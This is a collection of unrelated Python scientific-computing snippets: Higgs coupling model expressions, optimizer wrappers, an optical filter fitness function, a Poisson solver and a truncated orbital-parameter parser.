self.modelBuilder.doVar('expr::R_cc('+str(cc_expr)+')')\n self.modelBuilder.doVar('expr::R_tautau('+str(tautau_expr)+')')\n self.modelBuilder.doVar('expr::R_mumu('+str(mumu_expr)+')')\n self.modelBuilder.doVar('expr:R_gammagamma('+str(gmgm_expr)+')')\n\n self.modelBuilder.doVar('expr::gammaH(\"(0.5824*@0 + 0.2137*@1 + 0.08187*@2 + 0.06272*@3 + 0.02891*@4 + 0.02619*@5 + 0.002270*@6 + 0.001533*@7 + 0.0002176*@8 )/0.9998\",R_bb,R_WW,R_gg,R_tautau,R_cc,R_ZZ,R_gammagamma,R_Zgamma,R_mumu)') \n\n ###########################\n\n self.g1V = GetCoupTerms(1,1,1,-0.0001,\"1V\") # Compensate for scaling of k1 templates \n self.g2V = GetCoupTerms(1,1,1,-0.0001,\"2V\") \n \n self.modelBuilder.doVar(\"expr::g2V_1(\\\"\"+str(self.g2V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1(\\\"((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1_Neg(\\\"-1*((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.doVar(\"expr::g2V_2(\\\"\"+str(self.g2V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2(\\\"((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2_Neg(\\\"-1*((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.doVar(\"expr::g2V_3(\\\"\"+str(self.g2V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3(\\\"((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3_Neg(\\\"-1*((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.doVar(\"expr::g2V_4(\\\"\"+str(self.g2V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4(\\\"((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4_Neg(\\\"-1*((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.doVar(\"expr::g2V_5(\\\"\"+str(self.g2V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5(\\\"((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5_Neg(\\\"-1*((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, 
gammaH, g2V_5)\") \n self.modelBuilder.doVar(\"expr::g2V_6(\\\"\"+str(self.g2V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6(\\\"((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6_Neg(\\\"-1*((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.doVar(\"expr::g2V_7(\\\"\"+str(self.g2V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7(\\\"((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7_Neg(\\\"-1*((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.doVar(\"expr::g2V_8(\\\"\"+str(self.g2V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8(\\\"((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8_Neg(\\\"-1*((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.doVar(\"expr::g2V_9(\\\"\"+str(self.g2V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9(\\\"((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9_Neg(\\\"-1*((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.doVar(\"expr::g2V_10(\\\"\"+str(self.g2V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10(\\\"((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10_Neg(\\\"-1*((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.doVar(\"expr::g2V_11(\\\"\"+str(self.g2V[10])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11(\\\"((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11_Neg(\\\"-1*((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.doVar(\"expr::g2V_12(\\\"\"+str(self.g2V[11])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12(\\\"((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12_Neg(\\\"-1*((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.doVar(\"expr::g2V_13(\\\"\"+str(self.g2V[12])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13(\\\"((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13_Neg(\\\"-1*((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.doVar(\"expr::g2V_14(\\\"\"+str(self.g2V[13])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14(\\\"((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14_Neg(\\\"-1*((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.doVar(\"expr::g2V_15(\\\"\"+str(self.g2V[14])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15(\\\"((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15_Neg(\\\"-1*((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.doVar(\"expr::g2V_16(\\\"\"+str(self.g2V[15])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16(\\\"((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n 
self.modelBuilder.factory_(\"expr::scale_Ewk_T16_Neg(\\\"-1*((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.doVar(\"expr::g2V_17(\\\"\"+str(self.g2V[16])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17(\\\"((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17_Neg(\\\"-1*((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.doVar(\"expr::g2V_18(\\\"\"+str(self.g2V[17])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18(\\\"((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18_Neg(\\\"-1*((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.doVar(\"expr::g2V_19(\\\"\"+str(self.g2V[18])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19(\\\"((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19_Neg(\\\"-1*((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.doVar(\"expr::g2V_20(\\\"\"+str(self.g2V[19])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20(\\\"((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20_Neg(\\\"-1*((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.doVar(\"expr::g2V_21(\\\"\"+str(self.g2V[20])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21(\\\"((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21_Neg(\\\"-1*((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.doVar(\"expr::g2V_22(\\\"\"+str(self.g2V[21])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22(\\\"((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22_Neg(\\\"-1*((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.doVar(\"expr::g2V_23(\\\"\"+str(self.g2V[22])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23(\\\"((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23_Neg(\\\"-1*((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.doVar(\"expr::g2V_24(\\\"\"+str(self.g2V[23])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24(\\\"((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24_Neg(\\\"-1*((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.doVar(\"expr::g2V_25(\\\"\"+str(self.g2V[24])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25(\\\"((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25_Neg(\\\"-1*((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.doVar(\"expr::g2V_26(\\\"\"+str(self.g2V[25])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26(\\\"((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26_Neg(\\\"-1*((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.doVar(\"expr::g2V_27(\\\"\"+str(self.g2V[26])+\"\\\",)\") \n 
self.modelBuilder.factory_(\"expr::scale_Ewk_T27(\\\"((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27_Neg(\\\"-1*((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.doVar(\"expr::g2V_28(\\\"\"+str(self.g2V[27])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28(\\\"((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28_Neg(\\\"-1*((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.doVar(\"expr::g2V_29(\\\"\"+str(self.g2V[28])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29(\\\"((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29_Neg(\\\"-1*((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.doVar(\"expr::g2V_30(\\\"\"+str(self.g2V[29])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30(\\\"((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30_Neg(\\\"-1*((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.doVar(\"expr::g2V_31(\\\"\"+str(self.g2V[30])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31(\\\"((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31_Neg(\\\"-1*((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.doVar(\"expr::g2V_32(\\\"\"+str(self.g2V[31])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32(\\\"((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32_Neg(\\\"-1*((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.doVar(\"expr::g2V_33(\\\"\"+str(self.g2V[32])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33(\\\"((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33_Neg(\\\"-1*((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.doVar(\"expr::g2V_34(\\\"\"+str(self.g2V[33])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34(\\\"((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34_Neg(\\\"-1*((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.doVar(\"expr::g2V_35(\\\"\"+str(self.g2V[34])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35(\\\"((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35_Neg(\\\"-1*((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n \n self.modelBuilder.doVar(\"expr::g1V_1(\\\"\"+str(self.g1V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1(\\\"((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1_Neg(\\\"-1*((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.doVar(\"expr::g1V_2(\\\"\"+str(self.g1V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2(\\\"((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2_Neg(\\\"-1*((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n 
self.modelBuilder.doVar(\"expr::g1V_3(\\\"\"+str(self.g1V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3(\\\"((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3_Neg(\\\"-1*((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.doVar(\"expr::g1V_4(\\\"\"+str(self.g1V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4(\\\"((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4_Neg(\\\"-1*((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.doVar(\"expr::g1V_5(\\\"\"+str(self.g1V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5(\\\"((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5_Neg(\\\"-1*((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.doVar(\"expr::g1V_6(\\\"\"+str(self.g1V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6(\\\"((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6_Neg(\\\"-1*((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.doVar(\"expr::g1V_7(\\\"\"+str(self.g1V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7(\\\"((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7_Neg(\\\"-1*((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.doVar(\"expr::g1V_8(\\\"\"+str(self.g1V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8(\\\"((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8_Neg(\\\"-1*((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.doVar(\"expr::g1V_9(\\\"\"+str(self.g1V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9(\\\"((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9_Neg(\\\"-1*((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.doVar(\"expr::g1V_10(\\\"\"+str(self.g1V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10(\\\"((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10_Neg(\\\"-1*((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n \n self.modelBuilder.doSet(\"POI\",poi)", "def _optimise(self):\n pass", "def optimize_params(self, qnodes=None):\n #logger.debug(\"optimize_params of baseclass --> no optimization available!!!\")\n return {}", "def solvate(self):\n\n pass", "def optimizer(grad, method, init_par, alpha, delta, plx_obs, mualpha_obs, mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N):\r\n\r\n\t\r\n\tif grad == 'NO':\r\n\t\tif method == 'Powell' :\r\n\t\t\tres = opt.minimize(Ulike,init_par, method = method,\r\n\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N))\r\n\t\t\treturn res.x, res.nit\r\n\t\telif method == 'Nelder-Mead':\r\n\t\t\tres = opt.minimize(Ulike,init_par, method = method,\r\n\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N),\r\n\t\t\t\t options = {'ftol': 0.0001})\r\n\t\t\treturn res.x, res.nit\r\n\t\telif method == 'default':\r\n\t\t\tres = opt.minimize(Ulike,init_par, \r\n\t\t\t args = (alpha, delta, plx_obs, 
mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N))\r\n\t\t\treturn res.x, res.nit\r\n\r\n\telif grad == 'YES':\r\n\t\tres = opt.minimize(Ulike, init_par, method = method, jac = stella_grad_full, \r\n \t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N),\r\n\t\t\t options={'disp': True, 'maxiter': 4000, 'xtol': 1e-4})\r\n\t\treturn res.x, res.nit \r\n\t\t\t\r\n\t\t\r\n\telif grad == 'HESS':\r\n\t\tres = opt.minimize(Ulike, init_par, method = method, jac = stella_grad_full, hess = stella_hessian,\r\n\t\t\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N),\r\n\t\t\t\t\t options = {'disp': True, 'maxiter': 4000, 'xtol': 1.e-06}) \r\n\t\treturn res.x, res.nit", "def FitnessSkopt5D(inputParams):\n\n elecsusParams = baseParams.copy()\n\n paramDict = {'Bfield': inputParams[0], \"T\": inputParams[1], 'Btheta': np.deg2rad(inputParams[2]), 'Etheta': np.deg2rad(inputParams[3]), 'Bphi': np.deg2rad(inputParams[4])}\n\n # This is the full dictionary to use on ElecSus.\n elecsusParams.update(paramDict)\n\n # First generate the output transmission as before.\n inputE = np.array([np.cos(elecsusParams[\"Etheta\"]), np.sin(elecsusParams[\"Etheta\"]), 0])\n\n # Call ElecSus to obtain the output electric field.\n try:\n # There may at times be issues with ElecSus, such as when NaN is entered as a variable.\n [outputE] = elecsus.calculate(globalDetuning, inputE, elecsusParams, outputs = [\"E_out\"])\n except:\n print(\"There was an issue in ElecSus, so this iteration will return a figure of merit of 0. Here are the input parameters:\")\n print(\"Input parameters: \" + str(elecsusParams))\n print(\"Input field: \" + str(inputE))\n return 0.0\n \n # Use a Jones matrix to determine the electric field after the action of the second polariser. As this is a single filter, the two polarisers are crossed.\n polariserAngle = elecsusParams[\"Etheta\"] + np.pi/2\n\n # Define the Jones matrix. Though only explicitly defined for the x-y plane, we add the third dimension so that we can use all 3 dimensions of the output field.\n jonesMatrix = np.matrix([[np.cos(polariserAngle)**2, np.sin(polariserAngle)*np.cos(polariserAngle), 0],\n\t\t\t\t\t\t\t\t[np.sin(polariserAngle)*np.cos(polariserAngle), np.sin(polariserAngle)**2, 0],\n [0, 0, 1]])\n\n # Get the output from the filter and the polarisers.\n singleFilterOutputE = np.array(jonesMatrix * outputE)\n\n # Get the transmission.\n singleFilterTransmission = (singleFilterOutputE * singleFilterOutputE.conjugate()).sum(axis=0)\n\n ENBW = ((integrate(singleFilterTransmission, globalDetuning)/singleFilterTransmission.max().real)/1e3).real\n\n figureOfMerit = (singleFilterTransmission.max()/ENBW).real\n \n if np.isnan(figureOfMerit):\n # Usually occurs in the case of high temperatures and B fields, since the transmission is just a flat line.\n print(\"Figure of merit is NaN! 
Here are the input parameters:\")\n print(str(elecsusParams))\n return 0.0\n else:\n return -1.0 * figureOfMerit", "def potentialSolver2(self, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def _parse_orbital_parameters(orbi):\n # adapted from rebound \n # (https://github.com/hannorein/rebound/blob/master/rebound/particle.py)\n\n try:\n P,e,inc,Omega,omega,pomega,f,M,l,theta,Tp = orbi\n except ValueError as e:\n raise ValueError('Got the wrong number of orbital parameters. '\\\n 'This should not have happened...')\n\n if P is None: \n # we will have to generate an orbital period\n pass\n\n\n ## other parameters\n if e is None:\n # we will have to generate an eccentricity\n pass\n if inc is None:\n inc = 0. # assumed\n\n ## angles\n if Omega is None: # we require that Omega be passed if you want to specify longitude of node\n Omega = 0.\n\n pericenters = [omega, pomega] # We need omega; can specify it either directly or through pomega\n numNones = pericenters.count(None)\n\n if numNones == 0:\n raise ValueError(\"You can't pass both omega and pomega\")\n if numNones == 2: # Neither passed. 
